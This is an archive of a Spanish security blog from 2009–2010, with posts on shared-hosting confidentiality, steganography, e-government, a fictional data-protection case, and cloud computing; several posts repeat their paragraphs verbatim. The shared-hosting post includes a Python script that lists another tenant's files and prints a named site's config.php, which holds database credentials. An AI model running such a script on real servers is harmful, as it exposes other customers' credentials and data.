viernes, 24 de septiembre de 2010
Nos mudamos
A partir de hoy podreis leer todas las entradas antiguas y las nuevas en nuestro nuevo blog Criptotec Timeout
jueves, 22 de julio de 2010
Confidencialidad en Servidores Virtuales
¿Hace poco que has contratado un Servidor Virtual para publicar tu propio blog o montar tu tienda virtual? ¿No te has preguntado por qué es tan barato? Nosotros hace unos meses que nos lanzamos a contratar un servidor virtual para montar nuestras pequeñas aplicaciones y nos dimos cuenta por qué, a veces, "lo barato sale caro".
El proveedor de servicios al que contratamos el servidor virutal (se puede decir el pecado, pero no el pecador) nos ofrecía principalmente PHP, pero también otros lenguajes que nos interesaban bastante: python y perl. La cosa nos salió por unos 50 eurillos al año, "¡pecata minuta!"- pensamos.
El caso es que después de contratarlo, empezamos a hacer nuestras primeras pruebas con python y, en seguida, llegó nuestra primera sorpresa. Al intentar acceder a ficheros de nuestra cuenta en el servidor virtual nos dimos cuenta que también podíamos acceder a todos los ficheros del resto de usuarios o servidores virtuales que estaban en la misma máquina (incluso en algunos casos teníamos permisos no sólo para leer, sino para modificar el contenido). Si los ficheros fueran páginas WEB no habría mayor problema, pero si fueran páginas PHP con acceso a base de datos en los que están escritas tanto los usuarios como las contraseñas de acceso a bases de datos, entonces la cosa puede ser más grave (imaginaros por ejemplo si se trata de una tienda virtual y que con ese usuario y contraseña pudiéramos entrar en su base de datos).
Por ello, al final nos hemos limitado a utilizar este servidor virtual para páginas web estáticas y poniendo cuidado en restringir los permisos para que no puedan modificarnos la páginas.
Adjunto un ejemplo para que podáis comprobar en vuestros servidores virtuales tienen algún problema de confidencialidad, cambiando los paths:
El proveedor de servicios al que contratamos el servidor virutal (se puede decir el pecado, pero no el pecador) nos ofrecía principalmente PHP, pero también otros lenguajes que nos interesaban bastante: python y perl. La cosa nos salió por unos 50 eurillos al año, "¡pecata minuta!"- pensamos.
El caso es que después de contratarlo, empezamos a hacer nuestras primeras pruebas con python y, en seguida, llegó nuestra primera sorpresa. Al intentar acceder a ficheros de nuestra cuenta en el servidor virtual nos dimos cuenta que también podíamos acceder a todos los ficheros del resto de usuarios o servidores virtuales que estaban en la misma máquina (incluso en algunos casos teníamos permisos no sólo para leer, sino para modificar el contenido). Si los ficheros fueran páginas WEB no habría mayor problema, pero si fueran páginas PHP con acceso a base de datos en los que están escritas tanto los usuarios como las contraseñas de acceso a bases de datos, entonces la cosa puede ser más grave (imaginaros por ejemplo si se trata de una tienda virtual y que con ese usuario y contraseña pudiéramos entrar en su base de datos).
Por ello, al final nos hemos limitado a utilizar este servidor virtual para páginas web estáticas y poniendo cuidado en restringir los permisos para que no puedan modificarnos la páginas.
Adjunto un ejemplo para que podáis comprobar en vuestros servidores virtuales tienen algún problema de confidencialidad, cambiando los paths:
from mod_python import apache
import sys
import os
import re
import traceback
print """Content-type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
<link rel="stylesheet" type="text/css" href="../../css/style.css">
</head>
<body>
"""
print "<h3>Lista de archivos de perfumesmini.com/htdocs</h3>"
print "<pre>"
print os.listdir('/var/www/vhosts/perfumesmini.com/httpdocs')
print "</pre>"
print "<h3>Lista de archivos de perfumesmini.com/htdocs/config</h3>"
print "<pre>"
print os.listdir('/var/www/vhosts/perfumesmini.com/httpdocs/config')
print "<h3>Lista de archivos de perfumesmini.com/htdocs/includes</h3>"
print "<pre>"
print os.listdir('/var/www/vhosts/perfumesmini.com/httpdocs/includes')
print "<h3>Archivo perfumesmini.com/htdocs/config.php</h3>"
print "<pre>"
f = open('/var/www/vhosts/perfumesmini.com/httpdocs/config/config.php','r')
print "=============="
print "%s" % f.read(-1).replace('&','&').replace('<','<').replace('>','>')
print"==============="
f.close()
print """
</body>
</html>"""
martes, 2 de febrero de 2010
Patentes
Es un tanto denso de leer pero merece la pena verlo para comprobar lo que patenta la gente en Estados Unidos. Lo mismo es que yo no me he enterado mucho pero tampoco veo el asunto como algo digno de una patente.
System and Method for the Storage, Indexing and Retrieval of XML Documents using Relational Databases.
System and Method for the Storage, Indexing and Retrieval of XML Documents using Relational Databases.
jueves, 14 de enero de 2010
Parque Jurásico
En una de estas asociaciones extrañas que hace la mente, tiendo a asociar el termino esteganografía con la película Parque Jurásico. Supongo que es debido al dinosaurio llamado estegosaurio que en algo se parece su nombre con la palabra esteganografía.
Hace ya algunos años que escuche el temino de esteganografía y todavía tengo problemas para escribirlo correctamente. La esteganografía se basa en ocultar información dentro de archivos sin que éstos parezcan haber sido modificados. Para ello se utilizan los bits menos significativos de dichos archivos. Todos los formatos comprimidos tanto de música (MP3) y fotos (JPG) se basan en la eliminación de bits que no aportan nada ni al oído ni al ojo humano, logrando reducir el tamaño de los archivos de música o de fotos sin que éstos pierdan aparente calidad. La esteganografía utiliza esos mismos bits "inservibles" para ocultar dentro la información deseada, de tal forma que una foto podría contener un mensaje invisible para todos salvo para aquel que sabe extraer el mensaje incluído en la foto.
Existen ya varias aplicaciones que nos permiten crear archivos con mensajes ocultos mediante esteganografía. Yo personalmente me quedo con esta demo llamada TREX , como el dinosaurio, que me ha gustado.
Hace ya algunos años que escuche el temino de esteganografía y todavía tengo problemas para escribirlo correctamente. La esteganografía se basa en ocultar información dentro de archivos sin que éstos parezcan haber sido modificados. Para ello se utilizan los bits menos significativos de dichos archivos. Todos los formatos comprimidos tanto de música (MP3) y fotos (JPG) se basan en la eliminación de bits que no aportan nada ni al oído ni al ojo humano, logrando reducir el tamaño de los archivos de música o de fotos sin que éstos pierdan aparente calidad. La esteganografía utiliza esos mismos bits "inservibles" para ocultar dentro la información deseada, de tal forma que una foto podría contener un mensaje invisible para todos salvo para aquel que sabe extraer el mensaje incluído en la foto.
Existen ya varias aplicaciones que nos permiten crear archivos con mensajes ocultos mediante esteganografía. Yo personalmente me quedo con esta demo llamada TREX , como el dinosaurio, que me ha gustado.
lunes, 28 de diciembre de 2009
E-Government
O lo que es lo mismo: la capacidad de lidiar con la Administración Pública, sentado cómodamente delante del ordenador de tu casa y no de pie en una cola, con el miedo en el cuerpo por si se te ha olvidado algún papelito. ¿A que suena bien? Entonces, ¿por qué fracasan algunas iniciativas?. Aquí os dejo un artículo, el cual expone que, para que el e-government funcione, es necesario tener la confianza del ciudadano. Yo me quedo con esta frase:
"...la confianza del ciudadano depende de la calidad de la comunicación existente entre las partes, del grado de satisfacción del ciudadano, del nivel de usabilidad del sitio web a través del cual se prestan los servicios, de la seguridad y protección de la privacidad percibidas por el ciudadano y del grado de familiaridad con el sitio web..."
Total nada,...si es que somos unos desconfiados.
"...la confianza del ciudadano depende de la calidad de la comunicación existente entre las partes, del grado de satisfacción del ciudadano, del nivel de usabilidad del sitio web a través del cual se prestan los servicios, de la seguridad y protección de la privacidad percibidas por el ciudadano y del grado de familiaridad con el sitio web..."
Total nada,...si es que somos unos desconfiados.
martes, 22 de diciembre de 2009
La importancia de los datos
Francisco Cifuentes, gran y estudioso muchacho acaba de terminar sus estudios de Contabilidad y Finanzas. Harto ya de hacer la declaración de la renta a su familia y amigos sin ver un duro durante años, ha decidido montar su propia empresa para así cobrar por cada declaración de la renta que hace.
Cuando tiene su empresa, la Gestoría Martinez se pone en contacto con él puesto que anda algo saturada de trabajo y le va a pasar a algunos de sus clientes. Francisco, que no se esperaba tal éxito, habla con su amigo del alma Jose que hizo un curso de informática, para que le monte un sistema para almacenar los datos de los nuevos clientes y automatizar lo más posible sus declaraciones. Jose realiza una aplicación utilizando sus conocimientos en C++ y Access perfectamente protegido por usuario y contraseña.
Cuando la cosa va mejor Francisco le deja su usuario y contraseña para acceder a la aplicación a su secretaria Tere para que así Tere haga parte del trabajo y él ande mas libre.
Un buen día Tere, trabajando con la aplicación, descubre los datos financieros de su marido, el cuál dispone de varias cuentas y acciones que oculta a su esposa. Tere monta en cólera y se lo recrimina a su marido. Su marido que no entiende cómo se ha podido enterar su mujer de sus datos denuncia a la Gestoría Martínez ante Agencia de Protección de Datos.
La Agencia aplica la Ley Orgánica de Protección de Datos con el siguiente resultado:
Pd: Todos los nombres son inventados.
Cuando tiene su empresa, la Gestoría Martinez se pone en contacto con él puesto que anda algo saturada de trabajo y le va a pasar a algunos de sus clientes. Francisco, que no se esperaba tal éxito, habla con su amigo del alma Jose que hizo un curso de informática, para que le monte un sistema para almacenar los datos de los nuevos clientes y automatizar lo más posible sus declaraciones. Jose realiza una aplicación utilizando sus conocimientos en C++ y Access perfectamente protegido por usuario y contraseña.
Cuando la cosa va mejor Francisco le deja su usuario y contraseña para acceder a la aplicación a su secretaria Tere para que así Tere haga parte del trabajo y él ande mas libre.
Un buen día Tere, trabajando con la aplicación, descubre los datos financieros de su marido, el cuál dispone de varias cuentas y acciones que oculta a su esposa. Tere monta en cólera y se lo recrimina a su marido. Su marido que no entiende cómo se ha podido enterar su mujer de sus datos denuncia a la Gestoría Martínez ante Agencia de Protección de Datos.
La Agencia aplica la Ley Orgánica de Protección de Datos con el siguiente resultado:
- La gestoría Martinez, que por un error no ha solicitado la autorización de sus clientes para ceder sus datos financieros, comete una falta grave y es sancionada entre 60.000 y 300.000 €
- Francisco Cifuentes a su vez, al no protejer convenientemente los datos y permitir que su secretaria los vea sin la pertinente autorización, comete una falta muy grave sancionada entre 300.000 y 600.000 €
- Al mismo tiempo por no haber dado de alta el archivo Access y por que dicho archivo no cuenta con las medidas de seguridad necesarias dada la importancia de los datos almacenados, comete otra falta muy grave.
- Tere recibe una sanción de entre 600 y 60.000 € por incumplir el deber de secreto.
- Jose se libra porque no le ha hecho factura y no se puede demostrar que el software es suyo
Pd: Todos los nombres son inventados.
lunes, 7 de diciembre de 2009
Nubes
Desde hace algún tiempo ha aparecido en el panoráma informático el término "cloud computing" (que viene a traducirse como computación en nube). ¿Qué es eso?
Resumiendo, "cloud computing" es dejar en manos de otros todas las aplicaciones y datos que ahora manejamos de forma local en nuestro ordenador. Grandes corporaciones, como Google, se estan lanzando rápidamente a la creación de sistemas "cloud" para lograr hacerse con éste mercado emergente. Las nuevas velocidades de ADSL y la facilidad para disponer de Internet en la actualidad, hacen que la gente piense en la red más como una herramienta, que como algo para simplemente navegar y usar el correo (sin olvidar las descargas de software, peliculas, música, etc). Cada vez más, los usuarios se acostumbran a almacenar sus fotos en internet (Picasa es un ejemplo de ello), para así poder verlas desde cualquier punto y compartirlas con amigos; y a crear y compartir documentos (Google Docs).
Y aunque parece que todo es muy bonito como las nubes.... no todo es tan bonito:
Éstos artículos han sido obtenidos a través del Blog de Enrique Dans
Resumiendo, "cloud computing" es dejar en manos de otros todas las aplicaciones y datos que ahora manejamos de forma local en nuestro ordenador. Grandes corporaciones, como Google, se estan lanzando rápidamente a la creación de sistemas "cloud" para lograr hacerse con éste mercado emergente. Las nuevas velocidades de ADSL y la facilidad para disponer de Internet en la actualidad, hacen que la gente piense en la red más como una herramienta, que como algo para simplemente navegar y usar el correo (sin olvidar las descargas de software, peliculas, música, etc). Cada vez más, los usuarios se acostumbran a almacenar sus fotos en internet (Picasa es un ejemplo de ello), para así poder verlas desde cualquier punto y compartirlas con amigos; y a crear y compartir documentos (Google Docs).
Y aunque parece que todo es muy bonito como las nubes.... no todo es tan bonito:
Éstos artículos han sido obtenidos a través del Blog de Enrique Dans
Suscribirse a:
Entradas (Atom)